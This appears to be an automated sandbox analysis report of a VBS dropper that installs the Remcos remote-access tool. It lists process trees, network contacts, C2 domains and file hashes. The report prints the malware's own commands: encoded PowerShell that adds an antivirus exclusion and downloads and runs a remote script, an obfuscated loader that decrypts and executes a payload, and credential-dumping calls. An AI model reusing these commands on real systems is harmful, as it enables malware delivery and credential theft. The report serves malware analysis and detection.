Analysis Overview
SHA256
e6e8a9afd766ad37eb26f95a91ce4f85183ec483242d86845e87c5bdaeec9f0d
Threat Level: Known bad
The file SHP_01992336.vbs was found to be: Known bad.
Malicious Activity Summary
Remcos
NirSoft MailPassView
NirSoft WebBrowserPassView
Detected Nirsoft tools
Blocklisted process makes network request
Reads user/profile data of web browsers
Checks computer location settings
Accesses Microsoft Outlook accounts
Suspicious use of SetThreadContext
Enumerates physical storage devices
Command and Scripting Interpreter: PowerShell
Modifies registry class
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Suspicious behavior: MapViewOfSection
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-19 10:17
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-19 10:17
Reported
2024-07-19 10:19
Platform
win7-20240704-en
Max time kernel
122s
Max time network
126s
Command Line
Signatures
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SHP_01992336.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SHP_01992336.vbs" /elevate
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAJwA=
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc aQB3AHIAIAAtAFUAcgBpACAAaAB0AHQAcAA6AC8ALwAxADcAMgAuADIANAA1AC4AMQAzADUALgAxADQAMwAvADUANQAwADUANQAvAGMALwBJAEUAYwBoAGUAYwBrAGkAbgBnAGIAbwBvAGsALgB2AEIAUwAgAC0ATwB1AHQARgBpAGwAZQAgACQAZQBuAHYAOgBUAEUATQBQAFwAeQB6AGUAZgBYAEMAcgB4AFQAcAB3AHIAYgBKAGgAVABvAEYAUwAuAHYAQgBTADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBUAEUATQBQAFwAeQB6AGUAZgBYAEMAcgB4AFQAcAB3AHIAYgBKAGgAVABvAEYAUwAuAHYAQgBTAA==
Network
Files
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 4f8da4a0af71d4efa352820eb2974562 |
| SHA1 | 25e0684deafae353e77325c7578cf6a83fd8bd6f |
| SHA256 | 471932ddc4891e799ac12272c9496a10d43977e34c0ee7c9af80b75ae31ea697 |
| SHA512 | 7a40b8a0cf11c84d444829fd0d00cdb5403caa8db478c98c2b7543f354e8334b7e01b3b4e4d66c96f4191626f117b5b32e68c89eebf1f610f45bd9fe06dca3b4 |
memory/2304-9-0x000000001B1E0000-0x000000001B4C2000-memory.dmp
memory/2304-10-0x00000000021F0000-0x00000000021F8000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-19 10:17
Reported
2024-07-19 10:19
Platform
win10v2004-20240709-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
Remcos
Detected Nirsoft tools
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
NirSoft MailPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Reads user/profile data of web browsers
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 5108 set thread context of 1796 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 1796 set thread context of 1760 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 1796 set thread context of 1980 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 1796 set thread context of 3576 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SHP_01992336.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SHP_01992336.vbs" /elevate
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAJwA=
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc aQB3AHIAIAAtAFUAcgBpACAAaAB0AHQAcAA6AC8ALwAxADcAMgAuADIANAA1AC4AMQAzADUALgAxADQAMwAvADUANQAwADUANQAvAGMALwBJAEUAYwBoAGUAYwBrAGkAbgBnAGIAbwBvAGsALgB2AEIAUwAgAC0ATwB1AHQARgBpAGwAZQAgACQAZQBuAHYAOgBUAEUATQBQAFwAeQB6AGUAZgBYAEMAcgB4AFQAcAB3AHIAYgBKAGgAVABvAEYAUwAuAHYAQgBTADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBUAEUATQBQAFwAeQB6AGUAZgBYAEMAcgB4AFQAcAB3AHIAYgBKAGgAVABvAEYAUwAuAHYAQgBTAA==
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\yzefXCrxTpwrbJhToFS.vBS"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI38252555980957241034615985855951CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnItyg30b2mPiin84dCXPYANAtNIMJrqHOYn2KTcOOVppbWc8q7E33whW3SgdTP4sjB+TWzniBqOGHiuCQ4Y49h1Btkm9Jra+JrtKddvNse+AMDwT/U73Lg/HLqyCgw9/H12ozMqugKnaQVKh9N7e59XtHcBlySItADKItTs6terp+uw9udYNzw6FvcAoM79HCA8tNsCODQU9s9do+WqdCibUSEsXgyOPFvQWRCIhedlAb5TwwyHT7pbiFdmOthryrCKvk1lcHH7bbNclCK3KxmKAdTg2CKQiA/EFW30DMGHKdgU1fe4xorJPChAgRzcZPBVNCW2fz/JP+l3q6P21vJUdr2gNhXJ2wI5nBvZ/BdQpVtfF66qBpvvjSNeFHaZQ4PE2lxpHpaghrC93FxtStvfYR5WcbzZ9hiMqAlPAFGctqa869qbjRfC7uWkp+ff11SG/YcWyvGioqn6QSSrISG/0sIoSvCwFOlezrAKikTRMs7fCu15CKIvob3S28rPW1EB/gTQeEC74Rwcy2n3zc8nf3LbP7NeRFWb7iarDlYdCNEfPidEaUZVTgIQdi+WKCm6ZDQn8Ske5ZBvgxC2DPMgUrl7rZ4EgVKW4lhUf2siQBITqt8e2AZ/Q7WrXt1HnsO1fjt5cgh/NoMZA4nOqFOjIrSarKOql2qV0Eab52EDqxdbxIwVvI/1kRiJfuUj6GN28FMj/eNWECOfERCY0kB+duLdS7I5cemA00VL8v6GHEPJ5UPnBJtUALs8KTn5WvCIkiZMSslD1+ijFbW8mkYZcqMeG+WqRfPP0YhexjdNamdAnoo+FlNUPdlrcBMYlh/oIOm/MvYFmDJoe+aqpozlApMWVPTZaWjaSLlAKHGv1/C5EQyyOdkHuAUYxVqg1NKCXch93jW7/kERB2WtvCSmk343Tj18sPlf7p9T1a0XuUWF6EhCgBXu1YkN6j8Ptk7Xdr6sX1cJXvNY93a0G23HNx4DluZZa9BzvqAQ8Rfc4noUvkKCc0FankjjaaiaWy368YbhRPUO8x3T8e8fUrMHZ6nG5BpG+g0UgsXaXGXHBtbOPK0jdWyRoZiEw3Kuoui3QoVygHPcbrVssEkAr3ROU9UVoJ5kMuIUQb74S8k63nj+Ho2Ga6yeMT/N4pOh22WVI+UqXn23IL3NDATKE6sprc/byS3eGZKNDDO7Q5asglt/0BHw1zMmwGCtwHQiwdU8YJrucBW7bajieLo3EsQGsxxBcqReQqjxMH5vg4lICoNC9uYYYQbcpk9op9eBLnX4TueRVHi1BlR462h22LI3keBwVUxxq05VVVpH6zsz8C5b835Y6SatJcIEU46h9g56vhwf8qUQ3sX6/m2j7FYCmRL1SdcFC9NOEs7z8BAPHicNM2d7z6ztL8NDIFjY4gXc/X4WfPwsHu9kVhnEJ4OfQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\kowmdzctlcdyhcdaewhjdzdwixqb"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\mqcedrnnzkvljqzevhulgmxnieikfzc"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\xkppekxovsnquwnieromrqsersrtykacou"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\xkppekxovsnquwnieromrqsersrtykacou"
Network
| Country | Destination | Domain | Proto |
| US | 172.245.135.143:80 | 172.245.135.143 | tcp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.135.245.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastecode.dev | udp |
| US | 172.66.40.229:443 | pastecode.dev | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| FR | 142.250.179.67:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.40.66.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.179.250.142.in-addr.arpa | udp |
| US | 198.46.176.133:80 | 198.46.176.133 | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.176.46.198.in-addr.arpa | udp |
| US | 172.245.135.143:80 | 172.245.135.143 | tcp |
| US | 8.8.8.8:53 | 2024remcmon.duckdns.org | udp |
| US | 192.210.214.9:14645 | 2024remcmon.duckdns.org | tcp |
| US | 192.210.214.9:14645 | 2024remcmon.duckdns.org | tcp |
| US | 8.8.8.8:53 | geoplugin.net | udp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
| US | 8.8.8.8:53 | 9.214.210.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.33.237.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
Files
memory/1092-0-0x00000205D03C0000-0x00000205D03E2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kkyzjd2h.xps.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | eb4d127b8a6f84a1cee423c5e3e3a51d |
| SHA1 | c55263a8ff097067f2393ce2120801a445fd1949 |
| SHA256 | d73b077e2ae7f7608ebf774fb83ab13c7bc7a5c3e4d9d96fda2bf695dc698514 |
| SHA512 | 45a52004f8b63ac089de017437ba0e03335f18469942795d36ce3c3d017f842e582103c91e07d9af0fa8dfbbe6f2f68f2fac91383a48b6535952a8630911f21e |
C:\Users\Admin\AppData\Local\Temp\yzefXCrxTpwrbJhToFS.vBS
| MD5 | 2718814507f5502e05d21540f0ebc5e1 |
| SHA1 | 5e33409f382ac6f9d52c8c49e0a0b12ce4dd2140 |
| SHA256 | d6ebd048f0ef80ea876bf28ac630c903b3c960bc7448ab8072f32a0e3e4334aa |
| SHA512 | ac5285820ba227dc4362150015244d5fd92be79c283ad1c30fb4683ef847491b08e7d92321278925a47de5c2215ea836958ab8a2cc6a8ed3429e9f4777bd0e8c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\5G8JI3LV\paste1[1].txt
| MD5 | ad6c37ef980373e9bcbd14810fad34bc |
| SHA1 | 9c061a1b3608b7c7f1db7cd06c8246913ee11bda |
| SHA256 | ee85057c1a562fc405d03b2b6a651612ac688dff5c9eeae88a0c1e34e17c602c |
| SHA512 | 30dc26060efcb4fd44be2d74cc4d33654ee0eb9039bd933c80b67afcc938bdba458cfa6bfc43d2ddb2f59dd6f9ddfe66951c56c61709a2dc02eac94e0e2ae97f |
memory/5108-51-0x0000020F377F0000-0x0000020F37912000-memory.dmp
memory/1796-52-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1796-54-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1796-56-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1796-57-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1796-58-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1796-59-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1796-60-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1796-62-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1796-61-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1796-64-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1760-65-0x0000000000400000-0x0000000000478000-memory.dmp
memory/1980-66-0x0000000000400000-0x0000000000462000-memory.dmp
memory/3576-67-0x0000000000400000-0x0000000000424000-memory.dmp
memory/1980-68-0x0000000000400000-0x0000000000462000-memory.dmp
memory/1760-74-0x0000000000400000-0x0000000000478000-memory.dmp
memory/1980-78-0x0000000000400000-0x0000000000462000-memory.dmp
memory/3576-73-0x0000000000400000-0x0000000000424000-memory.dmp
memory/3576-72-0x0000000000400000-0x0000000000424000-memory.dmp
memory/1760-71-0x0000000000400000-0x0000000000478000-memory.dmp
memory/1760-70-0x0000000000400000-0x0000000000478000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\kowmdzctlcdyhcdaewhjdzdwixqb
| MD5 | 982ebb238759653970e22ee9fad24470 |
| SHA1 | 15fca6be8cc4a276c9f70a73f28c52c3b0eead15 |
| SHA256 | c8b9cad5602932ea51b923f39f4b2d9aedf1f4915880d89032ab6636acaf9bea |
| SHA512 | c8777edf0dd3e72e0cf3bb89db2bc7856fed0eeca7199806fec341e9168899e3b700c73a6b2e7cb0e8ccc5523116d6ecfde5c9ebcc83288a162dd1b0ea78201b |
memory/1796-81-0x0000000010000000-0x0000000010019000-memory.dmp
memory/1796-84-0x0000000010000000-0x0000000010019000-memory.dmp
memory/1796-85-0x0000000010000000-0x0000000010019000-memory.dmp
memory/1796-86-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1796-87-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1796-88-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1796-89-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1796-90-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1796-91-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1796-92-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1796-93-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1796-94-0x0000000000400000-0x0000000000482000-memory.dmp